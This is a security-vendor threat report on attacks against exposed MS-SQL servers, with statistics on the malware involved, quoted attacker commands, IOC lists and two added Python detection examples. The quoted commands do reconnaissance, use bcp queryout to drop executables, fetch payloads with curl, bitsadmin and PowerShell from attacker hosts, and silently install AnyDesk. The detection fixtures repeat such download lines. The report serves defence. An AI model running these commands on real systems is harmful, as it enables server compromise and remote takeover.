Statistics Report on Malware Targeting Windows Database Servers in Q4 2025

AhnLab SEcurity intelligence Center (ASEC) uses the AhnLab Smart Defense (ASD) infrastructure to respond to and categorize attacks targeting MS-SQL and MySQL servers installed on Windows operating systems. This post covers the status of MS-SQL and MySQL servers that have become attack targets and statistics on the attacks against them, based on logs identified in the fourth quarter of 2025. It also categorizes the malware strains used in each attack and provides detailed statistics on them.

1. Status of Attacks Targeting Windows Database Servers

The following are statistics on attacks against MS-SQL servers in the fourth quarter of 2025, as confirmed through AhnLab Smart Defense (ASD) logs. While the number of attacks and of targeted systems had been decreasing, the number of attacks suddenly increased in December 2025.

The types of malware most used in attacks are CLRShell, which is exploited to execute the threat actor's commands, and Potato-family malware, which handles privilege escalation. Other types are also seen: CoinMiners use the resources of infected systems to mine cryptocurrency, while Proxyware shares a portion of the available internet bandwidth externally to generate profit. There are also cases where backdoors such as Gh0stRAT, CobaltStrike, and Meterpreter are installed to take control of the infected systems. Recently, legitimate remote control applications such as AnyDesk and RustDesk have also been installed alongside these backdoors.

2. Attacks in the 4th Quarter of 2025

Attack cases in which the Trigona threat actor targeted MS-SQL servers were covered in the fourth quarter of 2025. The Trigona threat actor remains active and continues to attack in a manner similar to past cases, but now uses new types of malware and tools. The Trigona ransomware threat actor targets MS-SQL servers that are exposed to the Internet and configured with simple account credentials, which leaves them vulnerable to brute-force and dictionary attacks. Upon successful login, the threat actor uses CLR Shell to install additional payloads, a tactic that has been consistent in recent cases. The following are the commands the threat actor executed after gaining control of the MS-SQL server to collect information about the infected system.

> hostname

> whoami

> systeminfo

> tasklist

> wmic useraccount where (LocalAccount=True) get name

> powershell -Command "net user ladmin"
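The password-guessing step that precedes everything shown above leaves its own trail: SQL Server writes error 18456 "Login failed" entries, including the client address, to the ERRORLOG. The following is an added example and not code from the ASEC report. It parses constructed ERRORLOG lines in the default layout, flags any client that accumulates several failures inside a short window, and records whether that client subsequently logged in, which is the point at which the post-login activity above would begin. The sample lines and the RFC 5737 addresses in them are constructed, not indicators from the report.

```python
"""Flag password guessing against MS-SQL from SQL Server ERRORLOG lines.

Added example, not part of the ASEC report. The log text below is a
constructed sample in the default ERRORLOG layout; the client addresses
are RFC 5737 documentation addresses, not indicators from the report.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one client fails three times inside a few seconds,
# a second client fails once, and the first client then logs in as 'sa'.
SAMPLE_ERRORLOG = """\
2025-12-03 02:14:07.11 Logon       Error: 18456, Severity: 14, State: 8.
2025-12-03 02:14:07.11 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2025-12-03 02:14:08.02 Logon       Error: 18456, Severity: 14, State: 8.
2025-12-03 02:14:08.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2025-12-03 02:14:09.55 Logon       Error: 18456, Severity: 14, State: 5.
2025-12-03 02:14:09.55 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.7]
2025-12-03 02:20:41.00 Logon       Error: 18456, Severity: 14, State: 8.
2025-12-03 02:20:41.00 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.9]
2025-12-03 02:21:02.40 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.7]
"""

_TS = r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ Logon\s+"
FAILED_RE = re.compile(_TS + r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<ip>[^\]]+)\]")
SUCCESS_RE = re.compile(_TS + r"Login succeeded for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<ip>[^\]]+)\]")


def parse_logon_events(text):
    """Return a list of (timestamp, client_ip, login_name, succeeded) per logon line."""
    events = []
    for line in text.splitlines():
        for pattern, ok in ((FAILED_RE, False), (SUCCESS_RE, True)):
            m = pattern.match(line)
            if m:
                events.append((datetime.fromisoformat(m["ts"]), m["ip"], m["user"], ok))
                break
    return events


def detect_password_guessing(text, threshold=3, window=timedelta(minutes=5)):
    """Return {client_ip: finding} for clients with >= threshold failed logins
    inside `window`. If such a client later logs in successfully, the finding
    records it: that is the point at which post-login activity would begin."""
    recent_failures = defaultdict(list)
    findings = {}
    for ts, ip, user, ok in sorted(parse_logon_events(text)):
        if ok:
            f = findings.get(ip)
            if f is not None and f["success_after"] is None:
                f["success_after"] = (user, ts.isoformat(sep=" "))
            continue
        # Slide the window: keep only this client's failures within `window`.
        recent_failures[ip] = [(t, u) for t, u in recent_failures[ip] if ts - t <= window]
        recent_failures[ip].append((ts, user))
        if len(recent_failures[ip]) >= threshold:
            f = findings.setdefault(ip, {"failures": 0, "users": set(), "success_after": None})
            f["failures"] = max(f["failures"], len(recent_failures[ip]))
            f["users"].update(u for _, u in recent_failures[ip])
    for f in findings.values():
        f["users"] = sorted(f["users"])
    return findings


if __name__ == "__main__":
    for ip, f in detect_password_guessing(SAMPLE_ERRORLOG).items():
        print(ip, f)
```

SQL Server records failed logins by default, so the only prerequisite is reading the ERRORLOG. The threshold and window are deliberately conservative; a dictionary attack against `sa` on an Internet-exposed instance typically produces far more than three failures per minute, and a success from a client that was just guessing is the event worth paging on.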

One of the key characteristics of the Trigona threat actor is that they create files using the Bulk Copy Program (BCP). bcp.exe is a command-line tool for importing and exporting large amounts of data in MS-SQL servers. Typically, it is used to export large amounts of data from a table in an SQL server into a local file, or to import data from a local file into a table in an SQL server.

The threat actor used BCP to store the malware in the database and then write it to a local file. In other words, the threat actor exported the malware to a local path with the following commands, reading it from the table "uGnzBdZbsi" where it was stored; "FODsOZKgAU.txt" is the format file that contains the format information. Both "uGnzBdZbsi" and "FODsOZKgAU.txt" are keywords that were also used in the 2024 attack case.

> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\spd.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"

> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\AD.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"

> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\[username]\music\L.bat" -T -f "C:\users\[username]\music\FODsOZKgAU.txt"

> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\[User Name]\music\pci2.exe" -T -f "C:\users\[User Name]\music\FODsOZKgAU.txt"

Figure 1. Creating malware using BCP

Of course, BCP is not the only tool being exploited, and various tools such as Curl, Bitsadmin, and PowerShell have been used to download malware.

> curl hxxps://cia[.]tf/60b30e194972f937b859d0075be69e2a.exe -o C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\glock.exe

> bitsadmin /transfer indirme  /download /priority normal hxxp://195.66.214[.]79/pci.exe c:\users\[User Name]\Videos\pci.exe

> powershell Invoke-WebRequest -Uri "hxxp://195.66.214[.]79/L.bat" -OutFile "c:\users\[User Name]\music\L.bat"

The threat actor, as in previous cases, utilized AnyDesk to control the infected system. The following commands were used to install AnyDesk in the %ALLUSERSPROFILE% path.

> %SystemDrive%/programdata/AD.exe --install C:\programdata --silent

> %SystemDrive%/programdata/Anydesk-e7eba7df --get-id
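Taken together, the reconnaissance commands, the BCP exports, the curl/bitsadmin/PowerShell downloads and the silent AnyDesk installation are all process creations whose parent or command line gives them away. The following is an added example and not code from the ASEC report: it applies four such rules to constructed process-creation records in this example's own schema (parent image, image, command line), the shape an EDR or Sysmon Event ID 1 would supply. The service account name `svc`, the download host 203.0.113.10 and the BITS job name are constructed; the bcp command line reuses the table and format-file names quoted above.

```python
"""Rules for the post-login process activity described in the report.

Added example, not code from the ASEC report. The records are constructed
process-creation events in this example's own schema (parent image, image,
command line). The account name 'svc', the host 203.0.113.10 and the BITS
job name are constructed; the bcp table and format-file names are the
report's own.
"""
import re
from pathlib import PureWindowsPath

# Shells and recon binaries sqlservr.exe has no business spawning; from the
# outside this is what a CLR shell or xp_cmdshell-driven command looks like.
SHELLS_AND_RECON = {"cmd.exe", "powershell.exe", "whoami.exe", "hostname.exe",
                    "systeminfo.exe", "tasklist.exe", "wmic.exe", "net.exe", "net1.exe"}
DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "powershell.exe"}
EXECUTABLE_EXTS = {".exe", ".dll", ".bat", ".cmd", ".ps1", ".msi", ".vbs"}

# Where each tool writes its output: bcp queryout, Invoke-WebRequest -OutFile,
# curl -o, and the trailing local path of bitsadmin /transfer.
_OUTPUT_PATTERNS = [
    re.compile(r"\bqueryout\s+\"?([^\"\s]+)\"?", re.I),
    re.compile(r"-OutFile\s+\"?([^\"\s]+)\"?", re.I),
    re.compile(r"\s-o\s+\"?([^\"\s]+)\"?", re.I),
    re.compile(r"/transfer\b.*\s(\S+)\s*$", re.I),
]


def written_path(cmdline):
    """Return the local output path a command line writes to, or None."""
    for pattern in _OUTPUT_PATTERNS:
        m = pattern.search(cmdline)
        if m:
            return m.group(1)
    return None


def _is_executable(path):
    return path is not None and PureWindowsPath(path).suffix.lower() in EXECUTABLE_EXTS


def classify(record):
    """Return the names of the rules one process-creation record trips."""
    parent = PureWindowsPath(record["parent"]).name.lower()
    image = PureWindowsPath(record["image"]).name.lower()
    cmd = record["cmdline"]
    low = cmd.lower()
    hits = []
    if parent == "sqlservr.exe" and image in SHELLS_AND_RECON:
        hits.append("sqlservr_spawns_shell_or_recon")
    if image == "bcp.exe" and "queryout" in low and _is_executable(written_path(cmd)):
        hits.append("bcp_queryout_writes_executable")
    if image in DOWNLOADERS and ("http" in low or "/transfer" in low) and _is_executable(written_path(cmd)):
        hits.append("lolbin_download_to_executable")
    if "--install" in low and "--silent" in low:
        hits.append("silent_remote_control_install")
    return hits


SAMPLE_EVENTS = [  # constructed records
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe",
     "cmdline": r'bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\spd.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 /download /priority normal http://203.0.113.10/pci.exe C:\Users\svc\Videos\pci.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell Invoke-WebRequest -Uri "http://203.0.113.10/L.bat" -OutFile "C:\Users\svc\music\L.bat"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\ProgramData\AD.exe",
     "cmdline": r"C:\programdata\AD.exe --install C:\programdata --silent"},
    # Benign control: a scheduled export of a table to CSV using bcp's "out" mode.
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe",
     "cmdline": r'bcp dbo.Orders out "D:\exports\orders.csv" -T -c'},
]


def scan(events):
    """Map each record index to the rules it trips, dropping clean records."""
    return {i: hits for i, hits in enumerate(map(classify, events)) if hits}


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["cmdline"], "->", hits)
```

The benign control record shows why the bcp rule keys on `queryout` plus an executable extension rather than on bcp.exe alone: scheduled table exports are common on database hosts, while a `queryout` that materialises a binary column as a `.exe` or `.bat` under ProgramData or a user profile is not.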

In addition, the following batch file was executed to add a user named "Remote99" or "Ladmin" that can access the system over RDP. The batch malware also has a function to modify the AnyDesk or UseLogonCredential registry key.

Figure 2. Batch file responsible for adding a user

Among the newly identified malware is a downloader created with Bat2Exe. Its main function is to create and execute a batch file like the one below. This batch script also creates an account named "erp2," but its additional function is to install an MSI file fetched from an external source. As of now, the download is unavailable, but it is presumed to be the installer of an RMM tool called Teramind. It appears that the threat actor used Teramind in addition to RDP and AnyDesk to control the infected system.

Figure 3. Teramind downloader script

One of the key differences from previous cases is that multiple scanner malware strains are being used. The scanner is written in Rust; upon execution, it transmits information about the infected system, including its IP and the location information obtained through "ip-api.com", to the C&C server. It then scans RDP and MS-SQL services according to the commands it receives.

Figure 4. Strings of the Rust scanner malware

Additionally, it appears that the threat actor runs tests before installing this scanning and brute-forcing malware. Among the tools installed by the threat actor are SpeedTest, an internet speed measurement tool provided by Ookla, and StressTester, which is presumed to have been developed by the threat actor. StressTester is written in Go and provides testing functions not only for GET and POST requests but also for SQL injection requests.

Figure 5. StressTester with SQL injection functions

MD5

2e4d250ecae8635fa3698eba5772a3b9
3c21181c35d955f9e557417998c38942
44bca3e7da4c28be4f55af0370091931
4af4c15092110057cb0a97df626c4ef4
4d627c63fdd8442eaf7d9be7e50d1e46

URL

http[:]//195[.]66[.]214[.]79/AD[.]exe
http[:]//195[.]66[.]214[.]79/AD[.]msi
http[:]//195[.]66[.]214[.]79/L[.]bat
http[:]//195[.]66[.]214[.]79/Monitor[.]exe
http[:]//195[.]66[.]214[.]79/drivers[.]txt

IP

179[.]43[.]159[.]186
198[.]55[.]98[.]133